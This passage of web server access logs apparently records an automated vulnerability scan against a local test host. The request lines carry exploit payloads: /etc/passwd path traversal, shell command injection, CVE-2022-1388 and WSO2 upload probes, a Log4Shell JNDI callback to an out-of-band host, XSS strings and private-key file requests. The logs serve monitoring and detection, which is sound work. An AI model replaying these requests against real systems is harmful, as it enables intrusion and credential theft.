AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{'jql':'project in projectsLeadByUser(\x2229KAY24Io4e9hSgjyP19LCdwLCg\x22)'}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/issueNav/1/issueTable HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cloudexp/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfiler/Login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-laravel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22get_user_login_cmd\x22:{\x22name\x22:\x22admin\x22,\x22password\x22:\x2221232f297a57a5a743894a0e4a801fc3\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.ca285tosmpvbafqg07h0k578b7np1s3tx.oast.fun}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/29kay5ourlykjvxcjajguzfs7eu.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private-key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../29KAY8o5AEbYxI91FcmomP7qFss.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%20../web-inf/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/29kay5ourlykjvxcjajguzfs7eu.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /privatekey.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/sendmail 